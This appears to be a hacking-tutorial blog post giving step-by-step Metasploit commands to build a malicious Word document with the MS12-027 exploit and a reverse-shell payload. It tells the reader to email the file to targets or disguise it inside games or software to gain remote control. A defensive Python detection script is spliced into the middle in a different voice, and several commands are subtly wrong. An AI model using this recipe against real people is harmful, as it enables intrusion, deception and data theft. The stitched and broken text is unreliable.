Metasploit Tutorial - 13 (hacking with MS Word files)

Steps and instructions -

Hey, what's up pen testers. In this tutorial you will learn how to make a malicious MS Word file to hack a Windows machine.

Steps -

* Open a terminal and type in "msfconsole" to run Metasploit.

* We will use a particular exploit for this hack. So type in

"use exploit/windows/fileformat/ms12_027_mscomctl_bof"

If you want some options information you can type in "show options"

In this exploit we will create our malicious payload, which will be a Microsoft Word document file.

We need to set up the payload. Type in

"use -p windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

Now we just need to type "exploit". This will create a file in /root/.msf7/local/msf.doc

We want to get the file on the Desktop.

So type in "cp /root/.msf7/local/msf.doc /root/Desktop/"

You will get the file on Desktop.

One more setup step is required: setting up our handler. Type in

"use exploit/multi/handler"

"set -p windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

All we need is to type "exploit" now.

* Now comes the part where you can mail this file to your target.

When the target downloads or opens the file, you will get a Meterpreter session.

Now you can dump data or do some post exploitation.

I just got VNC live on the target machine by typing "run VNC"

This hack is very good because some social sites allow MS Word files to be sent easily.

If the target is not available over the Internet, we can put this file inside other data such as games or software and name it "read me" or something like that.
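Seen from the receiving side, a .doc attachment like the one built above can be triaged before anyone opens it. The Python sketch below is an added example, not part of the original tutorial or of Metasploit's code. It assumes the file is an RTF document saved with a Word extension that embeds an MSComctlLib control (the MSCOMCTL.OCX component named in the module) as hex-encoded `\objdata`; the function names and the sample bytes are constructed for illustration.

```python
"""Triage a document for an embedded MSComctlLib ActiveX control (MS12-027)."""
import binascii
import re

# ProgID prefix shared by the controls in MSCOMCTL.OCX (assumption: the
# embedded object carries its class name in the object data).
PROGID_PREFIX = b"mscomctllib."
OBJDATA = re.compile(rb"\\objdata\b([0-9a-fA-F\s]+)")


def embedded_objects(data):
    """Yield the decoded bytes of every \\objdata hex stream in an RTF file."""
    for match in OBJDATA.finditer(data):
        # RTF readers skip whitespace inside hex data, so strip it first.
        digits = re.sub(rb"\s+", b"", match.group(1))
        digits = digits[: len(digits) // 2 * 2]  # drop a dangling nibble
        yield binascii.unhexlify(digits)


def triage(data, filename=""):
    """Return a list of findings for one file; an empty list means no hit."""
    findings = []
    is_rtf = data.lstrip()[:5].lower() == b"{\\rtf"
    if not is_rtf:
        return findings
    if filename.lower().endswith((".doc", ".docx")):
        # Weak signal on its own: benign tools also save RTF as .doc.
        findings.append("RTF content behind a Word extension")
    for blob in embedded_objects(data):
        if PROGID_PREFIX in blob.lower():
            findings.append("embedded object names an MSComctlLib control")
    return findings


def constructed_sample():
    """Constructed, inert RTF: an object header naming the control, no exploit data."""
    header = (b"\x01\x05\x00\x00\x02\x00\x00\x00\x1b\x00\x00\x00"
              b"MSComctlLib.ListViewCtrl.2\x00")
    hexed = binascii.hexlify(header).upper()
    wrapped = b"\r\n".join(hexed[i:i + 16] for i in range(0, len(hexed), 16))
    return b"{\\rtf1{\\object\\objocx{\\*\\objdata " + wrapped + b"}}}"


if __name__ == "__main__":
    for finding in triage(constructed_sample(), "msf.doc"):
        print("FLAG:", finding)
```

An empty result is not a clean bill of health: the check only normalises whitespace and letter case in the hex stream, so a hit should send the file to a sandbox or full RTF parser, and a miss should not clear it.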

Thank you guys for reading the tutorial.

I have made a complete set of tutorials starting from the beginner level.

